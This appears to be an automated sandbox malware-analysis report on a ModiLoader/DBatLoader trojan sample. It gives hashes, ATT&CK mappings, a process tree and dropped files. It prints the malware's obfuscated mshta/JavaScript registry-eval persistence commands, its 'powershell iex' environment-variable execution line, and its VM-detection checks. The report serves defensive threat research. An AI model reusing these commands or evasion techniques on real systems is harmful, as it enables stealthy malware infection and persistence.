modiloader | ec6ca2461cb77d91e47c6fc3eb67937019480511c04d8263a566bda38b355a7f

Analysis

max time kernel
150s
max time network
154s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
28-05-2024 23:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7ecf23f3ab2568c8dc95bd1ec0d3ad15_JaffaCakes118.exe
Size

794KB
MD5

7ecf23f3ab2568c8dc95bd1ec0d3ad15
SHA1

d7f7c3480bdeefd66d2e163130fcc0ca53eb5c2a
SHA256

ec6ca2461cb77d91e47c6fc3eb67937019480511c04d8263a566bda38b355a7f
SHA512

276241e61683fa432d3e071291d8a625788593190eb86ed0692556d1616d885a4586d074378251581e59ed9db4c3b4f1e9d294d62d74d89bbe3c162ac52b8398
SSDEEP

12288:1QHlW7lerECtu4aLgbqu6khVc0qI7oe3gPxWNpUcocscxFZwr:1QQperrOUj6k7ZqC30VFMlwr

Score

10^/10

modiloader evasion persistence trojan

Malware Config

Signatures

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
evasion

Software Discovery
T1518
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

regsvr32.exe

description ioc process

Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions regsvr32.exe
Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
evasion

File and Directory Discovery
T1083

Virtualization/Sandbox Evasion
T1497

Processes:

regsvr32.exe

description ioc process

File opened (read-only) C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys regsvr32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions	regsvr32.exe

description	ioc	process
File opened (read-only)	C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys	regsvr32.exe

ModiLoader Second Stage 58 IoCs

Processes:

resource	yara_rule
behavioral1/memory/3020-38-0x0000000000990000-0x0000000000A64000-memory.dmp	modiloader_stage2
behavioral1/memory/3020-37-0x0000000000990000-0x0000000000A64000-memory.dmp	modiloader_stage2
behavioral1/memory/3020-36-0x0000000000990000-0x0000000000A64000-memory.dmp	modiloader_stage2
behavioral1/memory/3020-35-0x0000000000990000-0x0000000000A64000-memory.dmp	modiloader_stage2
behavioral1/memory/3020-34-0x0000000000990000-0x0000000000A64000-memory.dmp	modiloader_stage2
behavioral1/memory/3020-33-0x0000000000990000-0x0000000000A64000-memory.dmp	modiloader_stage2
behavioral1/memory/3020-32-0x0000000000990000-0x0000000000A64000-memory.dmp	modiloader_stage2
behavioral1/memory/3020-31-0x0000000000990000-0x0000000000A64000-memory.dmp	modiloader_stage2
behavioral1/memory/3020-30-0x0000000000400000-0x0000000000439000-memory.dmp	modiloader_stage2
behavioral1/memory/3020-21-0x0000000000400000-0x0000000000439000-memory.dmp	modiloader_stage2
behavioral1/memory/3020-41-0x0000000000990000-0x0000000000A64000-memory.dmp	modiloader_stage2
behavioral1/memory/2212-44-0x0000000005D80000-0x0000000005E54000-memory.dmp	modiloader_stage2
behavioral1/memory/1552-47-0x0000000000110000-0x000000000024E000-memory.dmp	modiloader_stage2
behavioral1/memory/2212-48-0x0000000005D80000-0x0000000005E54000-memory.dmp	modiloader_stage2
behavioral1/memory/1552-45-0x0000000000110000-0x000000000024E000-memory.dmp	modiloader_stage2
behavioral1/memory/1552-55-0x0000000000110000-0x000000000024E000-memory.dmp	modiloader_stage2
behavioral1/memory/1552-63-0x0000000000110000-0x000000000024E000-memory.dmp	modiloader_stage2
behavioral1/memory/1552-62-0x0000000000110000-0x000000000024E000-memory.dmp	modiloader_stage2
behavioral1/memory/1552-61-0x0000000000110000-0x000000000024E000-memory.dmp	modiloader_stage2
behavioral1/memory/1552-60-0x0000000000110000-0x000000000024E000-memory.dmp	modiloader_stage2
behavioral1/memory/1552-59-0x0000000000110000-0x000000000024E000-memory.dmp	modiloader_stage2
behavioral1/memory/1552-58-0x0000000000110000-0x000000000024E000-memory.dmp	modiloader_stage2
behavioral1/memory/1552-57-0x0000000000110000-0x000000000024E000-memory.dmp	modiloader_stage2
behavioral1/memory/1552-56-0x0000000000110000-0x000000000024E000-memory.dmp	modiloader_stage2
behavioral1/memory/1552-54-0x0000000000110000-0x000000000024E000-memory.dmp	modiloader_stage2
behavioral1/memory/1552-53-0x0000000000110000-0x000000000024E000-memory.dmp	modiloader_stage2
behavioral1/memory/1552-52-0x0000000000110000-0x000000000024E000-memory.dmp	modiloader_stage2
behavioral1/memory/1552-51-0x0000000000110000-0x000000000024E000-memory.dmp	modiloader_stage2
behavioral1/memory/1552-50-0x0000000000110000-0x000000000024E000-memory.dmp	modiloader_stage2
behavioral1/memory/1552-49-0x0000000000110000-0x000000000024E000-memory.dmp	modiloader_stage2
behavioral1/memory/1552-66-0x0000000000110000-0x000000000024E000-memory.dmp	modiloader_stage2
behavioral1/memory/1552-64-0x0000000000110000-0x000000000024E000-memory.dmp	modiloader_stage2
behavioral1/memory/1552-65-0x0000000000110000-0x000000000024E000-memory.dmp	modiloader_stage2
behavioral1/memory/1552-68-0x0000000000110000-0x000000000024E000-memory.dmp	modiloader_stage2
behavioral1/memory/1552-67-0x0000000000110000-0x000000000024E000-memory.dmp	modiloader_stage2
behavioral1/memory/1552-69-0x0000000000110000-0x000000000024E000-memory.dmp	modiloader_stage2
behavioral1/memory/1552-71-0x0000000000110000-0x000000000024E000-memory.dmp	modiloader_stage2
behavioral1/memory/1552-76-0x0000000000110000-0x000000000024E000-memory.dmp	modiloader_stage2
behavioral1/memory/1552-80-0x0000000000110000-0x000000000024E000-memory.dmp	modiloader_stage2
behavioral1/memory/1552-79-0x0000000000110000-0x000000000024E000-memory.dmp	modiloader_stage2
behavioral1/memory/1552-78-0x0000000000110000-0x000000000024E000-memory.dmp	modiloader_stage2
behavioral1/memory/1552-81-0x0000000000110000-0x000000000024E000-memory.dmp	modiloader_stage2
behavioral1/memory/1552-77-0x0000000000110000-0x000000000024E000-memory.dmp	modiloader_stage2
behavioral1/memory/1552-70-0x0000000000110000-0x000000000024E000-memory.dmp	modiloader_stage2
behavioral1/memory/1552-88-0x0000000000110000-0x000000000024E000-memory.dmp	modiloader_stage2
behavioral1/memory/2644-89-0x0000000000110000-0x000000000024E000-memory.dmp	modiloader_stage2
behavioral1/memory/2644-93-0x0000000000110000-0x000000000024E000-memory.dmp	modiloader_stage2
behavioral1/memory/2644-100-0x0000000000110000-0x000000000024E000-memory.dmp	modiloader_stage2
behavioral1/memory/2644-90-0x0000000000110000-0x000000000024E000-memory.dmp	modiloader_stage2
behavioral1/memory/2644-99-0x0000000000110000-0x000000000024E000-memory.dmp	modiloader_stage2
behavioral1/memory/2644-98-0x0000000000110000-0x000000000024E000-memory.dmp	modiloader_stage2
behavioral1/memory/2644-97-0x0000000000110000-0x000000000024E000-memory.dmp	modiloader_stage2
behavioral1/memory/2644-96-0x0000000000110000-0x000000000024E000-memory.dmp	modiloader_stage2
behavioral1/memory/2644-95-0x0000000000110000-0x000000000024E000-memory.dmp	modiloader_stage2
behavioral1/memory/2644-94-0x0000000000110000-0x000000000024E000-memory.dmp	modiloader_stage2
behavioral1/memory/2644-92-0x0000000000110000-0x000000000024E000-memory.dmp	modiloader_stage2
behavioral1/memory/2644-91-0x0000000000110000-0x000000000024E000-memory.dmp	modiloader_stage2
behavioral1/memory/3020-127-0x0000000000990000-0x0000000000A64000-memory.dmp	modiloader_stage2

Looks for VMWare Tools registry key 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

regsvr32.exe

description ioc process

Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools regsvr32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools	regsvr32.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

regsvr32.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	regsvr32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	regsvr32.exe

Drops startup file 1 IoCs

Processes:

regsvr32.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\162913.lnk regsvr32.exe
Executes dropped EXE 1 IoCs

Processes:

UUPPHBZOfNIWNOEBZBhdR.exe

pid process

1292 UUPPHBZOfNIWNOEBZBhdR.exe
Loads dropped DLL 1 IoCs

Processes:

7ecf23f3ab2568c8dc95bd1ec0d3ad15_JaffaCakes118.exe

pid process

2172 7ecf23f3ab2568c8dc95bd1ec0d3ad15_JaffaCakes118.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\162913.lnk	regsvr32.exe

pid	process
1292	UUPPHBZOfNIWNOEBZBhdR.exe

pid	process
2172	7ecf23f3ab2568c8dc95bd1ec0d3ad15_JaffaCakes118.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

7ecf23f3ab2568c8dc95bd1ec0d3ad15_JaffaCakes118.exeregsvr32.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	7ecf23f3ab2568c8dc95bd1ec0d3ad15_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:Rq16ZXMLVe=\"W33edGi2q\";K2L=new%20ActiveXObject(\"WScript.Shell\");gN0lDglS=\"5\";oRfh5=K2L.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\ruqqchx\\\\uiksnqah\");nW5LjEw=\"mbr1n\";eval(oRfh5);Qtxy2K5U=\"KIoJIWaiH5\";"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:gJhjBa2mI=\"Ov8Be9\";qN4=new%20ActiveXObject(\"WScript.Shell\");BqdteF6s=\"6rHSFLifP\";txW4Z=qN4.RegRead(\"HKCU\\\\software\\\\ruqqchx\\\\uiksnqah\");TfErVmAs3=\"si\";eval(txW4Z);IL4uxYqy=\"weakOq5hGn\";"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Local\\d71742\\cc24ba.lnk\""	regsvr32.exe

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

regsvr32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	regsvr32.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	regsvr32.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

UUPPHBZOfNIWNOEBZBhdR.exepowershell.exeregsvr32.exe

description	pid	process	target process
PID 1292 set thread context of 3020	1292	UUPPHBZOfNIWNOEBZBhdR.exe	wscript.exe
PID 2212 set thread context of 1552	2212	powershell.exe	regsvr32.exe
PID 1552 set thread context of 2644	1552	regsvr32.exe	regsvr32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

Processes:

regsvr32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\International	regsvr32.exe

Modifies registry class 7 IoCs

Processes:

regsvr32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\49de3d\shell\open\command	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\49de3d\shell\open\command\ = "mshta \"javascript:ZyUDV1E4=\"HwXs\";QD6=new ActiveXObject(\"WScript.Shell\");voM34WGP=\"Szm5nM9I\";wU5G2f=QD6.RegRead(\"HKCU\\\\software\\\\ruqqchx\\\\uiksnqah\");ZLh4JiIHz=\"inO\";eval(wU5G2f);cGNK6qkQ9=\"JqKen\";\""	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\.c56af49	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\.c56af49\ = "49de3d"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\49de3d	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\49de3d\shell	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\49de3d\shell\open	regsvr32.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exeregsvr32.exe

pid	process
2212	powershell.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe
1552	regsvr32.exe

Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

powershell.exeregsvr32.exe

pid process

2212 powershell.exe
1552 regsvr32.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2212 powershell.exe

description	pid	process
Token: SeDebugPrivilege	2212	powershell.exe

Suspicious use of WriteProcessMemory 30 IoCs

Processes:

7ecf23f3ab2568c8dc95bd1ec0d3ad15_JaffaCakes118.exeUUPPHBZOfNIWNOEBZBhdR.exemshta.exepowershell.exeregsvr32.exe

description	pid	process	target process
PID 2172 wrote to memory of 1292	2172	7ecf23f3ab2568c8dc95bd1ec0d3ad15_JaffaCakes118.exe	UUPPHBZOfNIWNOEBZBhdR.exe
PID 2172 wrote to memory of 1292	2172	7ecf23f3ab2568c8dc95bd1ec0d3ad15_JaffaCakes118.exe	UUPPHBZOfNIWNOEBZBhdR.exe
PID 2172 wrote to memory of 1292	2172	7ecf23f3ab2568c8dc95bd1ec0d3ad15_JaffaCakes118.exe	UUPPHBZOfNIWNOEBZBhdR.exe
PID 2172 wrote to memory of 1292	2172	7ecf23f3ab2568c8dc95bd1ec0d3ad15_JaffaCakes118.exe	UUPPHBZOfNIWNOEBZBhdR.exe
PID 1292 wrote to memory of 3020	1292	UUPPHBZOfNIWNOEBZBhdR.exe	wscript.exe
PID 1292 wrote to memory of 3020	1292	UUPPHBZOfNIWNOEBZBhdR.exe	wscript.exe
PID 1292 wrote to memory of 3020	1292	UUPPHBZOfNIWNOEBZBhdR.exe	wscript.exe
PID 1292 wrote to memory of 3020	1292	UUPPHBZOfNIWNOEBZBhdR.exe	wscript.exe
PID 1292 wrote to memory of 3020	1292	UUPPHBZOfNIWNOEBZBhdR.exe	wscript.exe
PID 1292 wrote to memory of 3020	1292	UUPPHBZOfNIWNOEBZBhdR.exe	wscript.exe
PID 2684 wrote to memory of 2212	2684	mshta.exe	powershell.exe
PID 2684 wrote to memory of 2212	2684	mshta.exe	powershell.exe
PID 2684 wrote to memory of 2212	2684	mshta.exe	powershell.exe
PID 2684 wrote to memory of 2212	2684	mshta.exe	powershell.exe
PID 2212 wrote to memory of 1552	2212	powershell.exe	regsvr32.exe
PID 2212 wrote to memory of 1552	2212	powershell.exe	regsvr32.exe
PID 2212 wrote to memory of 1552	2212	powershell.exe	regsvr32.exe
PID 2212 wrote to memory of 1552	2212	powershell.exe	regsvr32.exe
PID 2212 wrote to memory of 1552	2212	powershell.exe	regsvr32.exe
PID 2212 wrote to memory of 1552	2212	powershell.exe	regsvr32.exe
PID 2212 wrote to memory of 1552	2212	powershell.exe	regsvr32.exe
PID 2212 wrote to memory of 1552	2212	powershell.exe	regsvr32.exe
PID 1552 wrote to memory of 2644	1552	regsvr32.exe	regsvr32.exe
PID 1552 wrote to memory of 2644	1552	regsvr32.exe	regsvr32.exe
PID 1552 wrote to memory of 2644	1552	regsvr32.exe	regsvr32.exe
PID 1552 wrote to memory of 2644	1552	regsvr32.exe	regsvr32.exe
PID 1552 wrote to memory of 2644	1552	regsvr32.exe	regsvr32.exe
PID 1552 wrote to memory of 2644	1552	regsvr32.exe	regsvr32.exe
PID 1552 wrote to memory of 2644	1552	regsvr32.exe	regsvr32.exe
PID 1552 wrote to memory of 2644	1552	regsvr32.exe	regsvr32.exe

C:\Users\Admin\AppData\Local\Temp\7ecf23f3ab2568c8dc95bd1ec0d3ad15_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\7ecf23f3ab2568c8dc95bd1ec0d3ad15_JaffaCakes118.exe"
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2172
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\UUPPHBZOfNIWNOEBZBhdR.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\UUPPHBZOfNIWNOEBZBhdR.exe UUPPHBZOfNIWNOEBZBh
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:1292
- - C:\Windows\SysWOW64\wscript.exe
    - CmdLine Args
    3⤵
    PID:3020

C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" javascript:JIS4XHtS="wE8uglw3h";LH0=new%20ActiveXObject("WScript.Shell");gQ6ozya7EJ="bTV8";Y2b2XQ=LH0.RegRead("HKLM\\software\\Wow6432Node\\Hx04oRgj\\Rr73F6Al");tA3HRJa="rLh";eval(Y2b2XQ);CnwE9Ch="P";
1⤵
- Suspicious use of WriteProcessMemory
PID:2684
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:ubmajmro
  2⤵
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2212
- - C:\Windows\SysWOW64\regsvr32.exe
    regsvr32.exe
    3⤵
    - Looks for VirtualBox Guest Additions in registry
    - Looks for VirtualBox drivers on disk
    - Looks for VMWare Tools registry key
    - Checks BIOS information in registry
    - Drops startup file
    - Adds Run key to start application
    - Maps connected drives based on registry
    - Suspicious use of SetThreadContext
    - Modifies Internet Explorer settings
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of WriteProcessMemory
    PID:1552
  - - C:\Windows\SysWOW64\regsvr32.exe
      "C:\Windows\SysWOW64\regsvr32.exe"
      4⤵
      PID:2644

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

File and Directory Discovery

T1083

Peripheral Device Discovery

T1120

Query Registry

T1012

Software Discovery

T1518

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\TcEMbLQgCOBP

Filesize
211KB

MD5
8fadfcb36f2fcb8cd5563aa718ff7958

SHA1
00ed85c2346231c8d9b146bf77abe37712f298a5

SHA256
abc35989ce7d5dddcaba45ee4fabf1d7029b6afc5ab11bfb6c69a8a5a9a79f91

SHA512
63b9bcd5361c13165104446d981022614c8f84345895937d0686d5b37407a105c196e2219a1f09feb552a778987ca6536e8914987073ba92b62364b62d4ce139

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\UUPPHBZOfNIWNOEBZBh

Filesize
38KB

MD5
adbbe9634b5819cc48cb9700d0d21f7b

SHA1
4a2f11f35db9fd8a3dfff28c9bfcd1463a8aeb2e

SHA256
af423bd619a7ddf795f53194985596794c30279a56221dd30b67c3a7ba19a865

SHA512
60d80abf67cedbd2d86459461b90eba039ec14b6f002daf44468ce621960d5fc745ccb6319f9c15fd0c29cfe6581ac2026d8747908005fbbf245d71144171d04

Download Submit
C:\Users\Admin\AppData\Local\d71742\043bcc.c56af49

Filesize
33KB

MD5
1b472e17d5013b15c94b0aa7131d1cd7

SHA1
b64e99be8a2bf47e5cb83ccee266968e2319879b

SHA256
91570976d4dd623c9a6e1c4b2a32eba74227853b18bc74f4ca0d4ee36ec87323

SHA512
5868282ec326de908ad5951046ca984b076f27112c17f590e5ba3efedc4bff01c14703ec1c133c491a5c51d1fc0e4845446923e2b4d175c2b6d204fda92c8a5b

Download Submit
C:\Users\Admin\AppData\Local\d71742\cc24ba.lnk

Filesize
877B

MD5
796e9e62db8020e9c8add46b887ba841

SHA1
07c7952978359625b73e5eabce1449b552da07d1

SHA256
b3565fcd6dece59961e6195daba921ea4fa99f96f62758d17eec06d1ef9f73e2

SHA512
b9d16d161f190be1b530d37d1fb8842f257d14e6645c1053ddfb1671014b4c80e98e878fbde0bcd849c2d810052991f6e484da797cf4c61d6573009d03ee8326

Download Submit
C:\Users\Admin\AppData\Local\d71742\ee03f2.bat

Filesize
61B

MD5
251c82732dbd03982f565deed73bb4f2

SHA1
2f903f60f1946953494fb995438cc2419abe59df

SHA256
4b67bfb9575e3dffcba2ad2d0c3b194119b1671d0e079ca9a2ff85b177d438f2

SHA512
1c6d1dd21ef660f870e23663b8f895f2255bf43830e93690217124a6b4a8cc563f97a4db145dd247b93bda3d49b7ef9d2ddf4ce58c72eccfb4609a356afd1344

Download Submit
C:\Users\Admin\AppData\Roaming\3aef84\6d4792.c56af49

Filesize
38KB

MD5
4bb5b121700eeec8e60cdfd560b2aa74

SHA1
039a11573e681d8adcb327bbfcc1d5fddf0a1e30

SHA256
fd25885b90e966540c575b286dd96af738194dd5085876a0e96a6c1594d90d90

SHA512
700ae6b102d49944bf9449d52dc57147a8939521ced3ab8fcaaa17c745a63b4029fc0430faee1f67acdafe2e3bbe84e6126ea00ebbe09ac6bb418517429bc6b4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\162913.lnk

Filesize
987B

MD5
6339e3dd8081a066e8b42cd033454254

SHA1
6fd499771a1921bd3a3d67a044e1870519e077bf

SHA256
e783742cde80e10e048e6eea8a32e400af782bc656162d38fac0155a50618754

SHA512
5b7b858ea01b85dd05c30db716f7a63c63d7f777fbe13c112e4f97c9515eafa135708d6558f105fbcece783dcd0321f7982181ca52f40fc4c80baff055cd2d06

Download Submit
C:\Users\Admin\AppData\Roaming\UUPPHBZOfNIWNOEBZBhdR.exe

Filesize
732KB

MD5
71d8f6d5dc35517275bc38ebcc815f9f

SHA1
cae4e8c730de5a01d30aabeb3e5cb2136090ed8d

SHA256
fb73a819b37523126c7708a1d06f3b8825fa60c926154ab2d511ba668f49dc4b

SHA512
4826f45000ea50d9044e3ef11e83426281fbd5f3f5a25f9786c2e487b4cf26b04f6f900ca6e70440644c9d75f700a4c908ab6f398f59c65ee1bff85dfef4ce59

Download Submit
memory/1292-19-0x0000000000160000-0x0000000000161000-memory.dmp

Filesize
4KB

Download
memory/1552-45-0x0000000000110000-0x000000000024E000-memory.dmp

Filesize
1.2MB

Download
memory/1552-61-0x0000000000110000-0x000000000024E000-memory.dmp

Filesize
1.2MB

Download
memory/1552-79-0x0000000000110000-0x000000000024E000-memory.dmp

Filesize
1.2MB

Download
memory/1552-81-0x0000000000110000-0x000000000024E000-memory.dmp

Filesize
1.2MB

Download
memory/1552-77-0x0000000000110000-0x000000000024E000-memory.dmp

Filesize
1.2MB

Download
memory/1552-70-0x0000000000110000-0x000000000024E000-memory.dmp

Filesize
1.2MB

Download
memory/1552-88-0x0000000000110000-0x000000000024E000-memory.dmp

Filesize
1.2MB

Download
memory/1552-80-0x0000000000110000-0x000000000024E000-memory.dmp

Filesize
1.2MB

Download
memory/1552-76-0x0000000000110000-0x000000000024E000-memory.dmp

Filesize
1.2MB

Download
memory/1552-47-0x0000000000110000-0x000000000024E000-memory.dmp

Filesize
1.2MB

Download
memory/1552-71-0x0000000000110000-0x000000000024E000-memory.dmp

Filesize
1.2MB

Download
memory/1552-69-0x0000000000110000-0x000000000024E000-memory.dmp

Filesize
1.2MB

Download
memory/1552-55-0x0000000000110000-0x000000000024E000-memory.dmp

Filesize
1.2MB

Download
memory/1552-63-0x0000000000110000-0x000000000024E000-memory.dmp

Filesize
1.2MB

Download
memory/1552-62-0x0000000000110000-0x000000000024E000-memory.dmp

Filesize
1.2MB

Download
memory/1552-78-0x0000000000110000-0x000000000024E000-memory.dmp

Filesize
1.2MB

Download
memory/1552-60-0x0000000000110000-0x000000000024E000-memory.dmp

Filesize
1.2MB

Download
memory/1552-59-0x0000000000110000-0x000000000024E000-memory.dmp

Filesize
1.2MB

Download
memory/1552-58-0x0000000000110000-0x000000000024E000-memory.dmp

Filesize
1.2MB

Download
memory/1552-57-0x0000000000110000-0x000000000024E000-memory.dmp

Filesize
1.2MB

Download
memory/1552-56-0x0000000000110000-0x000000000024E000-memory.dmp

Filesize
1.2MB

Download
memory/1552-54-0x0000000000110000-0x000000000024E000-memory.dmp

Filesize
1.2MB

Download
memory/1552-53-0x0000000000110000-0x000000000024E000-memory.dmp

Filesize
1.2MB

Download
memory/1552-52-0x0000000000110000-0x000000000024E000-memory.dmp

Filesize
1.2MB

Download
memory/1552-51-0x0000000000110000-0x000000000024E000-memory.dmp

Filesize
1.2MB

Download
memory/1552-50-0x0000000000110000-0x000000000024E000-memory.dmp

Filesize
1.2MB

Download
memory/1552-49-0x0000000000110000-0x000000000024E000-memory.dmp

Filesize
1.2MB

Download
memory/1552-66-0x0000000000110000-0x000000000024E000-memory.dmp

Filesize
1.2MB

Download
memory/1552-64-0x0000000000110000-0x000000000024E000-memory.dmp

Filesize
1.2MB

Download
memory/1552-65-0x0000000000110000-0x000000000024E000-memory.dmp

Filesize
1.2MB

Download
memory/1552-68-0x0000000000110000-0x000000000024E000-memory.dmp

Filesize
1.2MB

Download
memory/1552-67-0x0000000000110000-0x000000000024E000-memory.dmp

Filesize
1.2MB

Download
memory/2212-44-0x0000000005D80000-0x0000000005E54000-memory.dmp

Filesize
848KB

Download
memory/2212-48-0x0000000005D80000-0x0000000005E54000-memory.dmp

Filesize
848KB

Download
memory/2644-94-0x0000000000110000-0x000000000024E000-memory.dmp

Filesize
1.2MB

Download
memory/2644-96-0x0000000000110000-0x000000000024E000-memory.dmp

Filesize
1.2MB

Download
memory/2644-98-0x0000000000110000-0x000000000024E000-memory.dmp

Filesize
1.2MB

Download
memory/2644-97-0x0000000000110000-0x000000000024E000-memory.dmp

Filesize
1.2MB

Download
memory/2644-99-0x0000000000110000-0x000000000024E000-memory.dmp

Filesize
1.2MB

Download
